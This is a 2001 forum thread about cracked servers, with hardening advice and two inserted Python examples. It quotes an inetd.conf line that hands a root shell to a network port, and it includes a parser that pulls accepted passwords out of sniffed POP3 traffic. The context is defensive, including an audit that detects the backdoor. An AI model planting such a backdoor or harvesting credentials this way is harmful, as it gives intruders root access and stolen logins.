Re: ACKKKKKKKKK! I Have been cracked!

by petethered (Pilgrim)
on Apr 03, 2001 at 17:47 UTC


in reply to ACKKKKKKKKK! I Have been cracked!

I've been the person called in to repair dozens of cracked servers. A lot of the time, when a box gets cracked it's pure laziness.

You should always keep an ear out for security patches. You should always block IPs based on hosts.allow and hosts.deny. You should always have MySQL's access tables defined, and not world accessible. Don't allow anyone who isn't trusted telnet/ssh access to your box (once you're in, you're as good as root).

Doing this prevents the script kiddies from getting into your box, but this will not prevent a REAL cracker from accessing your box.

On a side note, I recently was called in to help fix a box and found the following backdoor installed.

in inetd.conf:

6464 stream tcp nowait root /bin/sh sh -i

So simple it was beautiful... a perfect back door that few people would catch.

-pete
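Added example, not code from pete's post: a small Python audit that parses inetd.conf text and flags entries shaped like the backdoor he found (a shell handed a socket as root, an interactive flag, a service named by raw port instead of an /etc/services name, a server living in a scratch directory). The sample inetd.conf inside it is constructed for the example, and the SHELLS / SCRATCH_DIRS lists and the function names are my own, not from any inetd distribution.

```python
import os
from dataclasses import dataclass, field
from typing import Dict, List

# Shell binaries: an inetd service that hands a socket straight to one of
# these as root is the classic bind-shell backdoor from the post.
SHELLS = {"sh", "bash", "dash", "ksh", "csh", "tcsh", "zsh"}

# World-writable directories a legitimate inetd server would never live in.
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Constructed sample inetd.conf for this example, not from a real host.
# The last line is the backdoor quoted in the post above.
SAMPLE_INETD_CONF = """\
# service  type    proto  wait    user    server           args
ftp        stream  tcp    nowait  root    /usr/sbin/tcpd   in.ftpd -l -a
telnet     stream  tcp    nowait  root    /usr/sbin/tcpd   in.telnetd
finger     stream  tcp    nowait  nobody  /usr/sbin/tcpd   in.fingerd
daytime    stream  tcp    nowait  root    internal
6464       stream  tcp    nowait  root    /bin/sh          sh -i
"""


@dataclass
class InetdEntry:
    service: str      # name from /etc/services, or a raw port number
    socket_type: str  # stream / dgram / ...
    protocol: str     # tcp / udp / ...
    wait: str         # wait / nowait
    user: str         # user the server runs as (group suffix stripped)
    server: str       # server program path, or "internal"
    args: List[str] = field(default_factory=list)  # argv[0] onwards


def parse_inetd_conf(text: str) -> List[InetdEntry]:
    """Parse inetd.conf text into entries, skipping comments and blank lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 6:
            continue  # malformed; inetd itself would reject it
        # The user field may carry a group as user.group or user:group.
        user = fields[4].replace(":", ".").split(".", 1)[0]
        entries.append(InetdEntry(fields[0], fields[1], fields[2], fields[3],
                                  user, fields[5], fields[6:]))
    return entries


def suspicious_reasons(entry: InetdEntry) -> List[str]:
    """Return the reasons an entry looks like a backdoor (empty list if none)."""
    reasons = []
    # Look at the server path and argv[0]; either may name the shell.
    programs = [os.path.basename(entry.server)]
    programs += [os.path.basename(a) for a in entry.args[:1]]
    runs_shell = any(p in SHELLS for p in programs)
    if runs_shell:
        reasons.append("server program is a shell (%s)" % entry.server)
    if runs_shell and entry.user == "root":
        reasons.append("that shell runs as root")
    if "-i" in entry.args:
        reasons.append("interactive flag -i on a network service")
    if entry.service.isdigit():
        reasons.append("service given as raw port %s rather than a name"
                       % entry.service)
    if entry.server.startswith(SCRATCH_DIRS):
        reasons.append("server lives in a scratch directory: %s" % entry.server)
    return reasons


def audit_inetd_conf(text: str) -> Dict[str, List[str]]:
    """Map each suspicious service (name or port) to the reasons it was flagged."""
    flagged = {}
    for entry in parse_inetd_conf(text):
        reasons = suspicious_reasons(entry)
        if reasons:
            flagged[entry.service] = reasons
    return flagged


if __name__ == "__main__":
    for service, reasons in audit_inetd_conf(SAMPLE_INETD_CONF).items():
        print(service)
        for r in reasons:
            print("  -", r)
```

Run it against the real file with audit_inetd_conf(open("/etc/inetd.conf").read()). The numeric-port rule is a heuristic (some old configs use port numbers legitimately), and xinetd uses a different file format, so treat hits as leads to check by hand, not verdicts.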

Replies are listed 'Best First'.
Re^2: ACKKKKKKKKK! I Have been cracked!
by tadman (Prior) on Apr 03, 2001 at 18:18 UTC
    As an aside that is hopefully not too OT, one of the boxes here was cracked once. It was all because of a simple (human) error. POP3/FTP passwords are sent plaintext, and so the system was configured to have different passwords for POP3/FTP from the system accounts. Unfortunately, due to laziness, I suppose, one of the admins set their password to be the same for both and later logged in from home to check their mail.

    A few days later, our box was cracked with an off-the-shelf "root kit". Even though we were using SSH, they were able to "sniff" the POP3 password over their cable modem and then log in using SSH, use SUDO, and have their way with our system.

    Thankfully the 'haX0r' only ran some sort of IRC bot or relay program and didn't do any real damage.

    Always make sure that your POP3 and FTP passwords are not the same as your SSH login! Especially for users with 'sudo' access!
      Actually, I'd recommend having completely separate accounts for sudo (only used off-site in emergencies, otherwise on-site only), with RSA authentication only. Keep the email on a separate, private, non-privileged account.

      --isotope
      http://www.skylab.org/~isotope/
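Added example, not code from tadman's or isotope's posts: a Python walk-through of the attack path described above. It pulls USER/PASS pairs out of a plaintext POP3 session (keeping only logins the server actually accepted, and skipping APOP, which sends a digest rather than the password), then checks whether any accepted mail password also unlocks the same user's system account. The captured session and the account table are constructed for the example, and the salted SHA-256 verifier is a stand-in for a real crypt(3) shadow hash; the function names are my own.

```python
import hashlib
from typing import Dict, List, Optional, Tuple

# Constructed capture of one POP3 session, one line per message, prefixed
# with the direction (C: client, S: server). Sample data for the example,
# not traffic from the machine in the post. The first PASS is rejected.
SAMPLE_POP3_CAPTURE = """\
S: +OK POP3 server ready <1234.5678@mail.example.org>
C: USER admin
S: +OK
C: PASS mailpass
S: -ERR [AUTH] Authentication failed.
C: USER admin
S: +OK
C: PASS Gr8Admin!
S: +OK Logged in.
C: STAT
S: +OK 2 3451
C: QUIT
S: +OK Bye
"""


def extract_pop3_logins(capture: str) -> List[Tuple[str, str, bool]]:
    """Return (user, password, accepted) for every PASS sent in the session.

    accepted is True only when the server answered +OK to that PASS, so a
    rejected guess is not reported as a valid credential. APOP logins carry
    an MD5 digest instead of the password and are not reported.
    """
    logins = []
    user: Optional[str] = None
    pending: Optional[Tuple[str, str]] = None
    for raw in capture.splitlines():
        if ": " not in raw:
            continue
        side, line = raw.split(": ", 1)
        if side == "C":
            cmd, _, arg = line.partition(" ")
            cmd = cmd.upper()
            if cmd == "USER":
                user = arg
            elif cmd == "PASS" and user is not None:
                pending = (user, arg)  # wait for the server's verdict
            elif cmd == "APOP":
                user = None  # digest on the wire, not the password
        elif side == "S" and pending is not None:
            logins.append((pending[0], pending[1], line.startswith("+OK")))
            pending = None
    return logins


def verifier(password: str, salt: str) -> str:
    """Stand-in for a system password hash (salted SHA-256, for illustration).

    Real shadow entries use crypt(3) schemes; the comparison logic is the same.
    """
    return hashlib.sha256((salt + password).encode()).hexdigest()


# Constructed stand-in for the system password database: user -> (salt, hash).
# "admin" reused the mail password for the system login; "bob" did not.
SAMPLE_SYSTEM_ACCOUNTS: Dict[str, Tuple[str, str]] = {
    "admin": ("x9Qk", verifier("Gr8Admin!", "x9Qk")),
    "bob": ("7mPz", verifier("bob-ssh-only", "7mPz")),
}


def reused_in_system_accounts(capture: str,
                              accounts: Dict[str, Tuple[str, str]]) -> List[str]:
    """Users whose sniffed, accepted POP3 password also unlocks their system account."""
    hits = []
    for user, password, accepted in extract_pop3_logins(capture):
        if not accepted or user not in accounts:
            continue
        salt, stored = accounts[user]
        if verifier(password, salt) == stored and user not in hits:
            hits.append(user)
    return hits


if __name__ == "__main__":
    for user, password, accepted in extract_pop3_logins(SAMPLE_POP3_CAPTURE):
        print("%-6s %-12s %s" % (user, password, "accepted" if accepted else "rejected"))
    print("reused on system accounts:", reused_in_system_accounts(
        SAMPLE_POP3_CAPTURE, SAMPLE_SYSTEM_ACCOUNTS))
```

The point of the second half is that once the password is on the wire in the clear, the only thing between the sniffer and a shell is whether the same secret works on SSH; if that user is also in sudoers, as in tadman's case, the box is gone.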
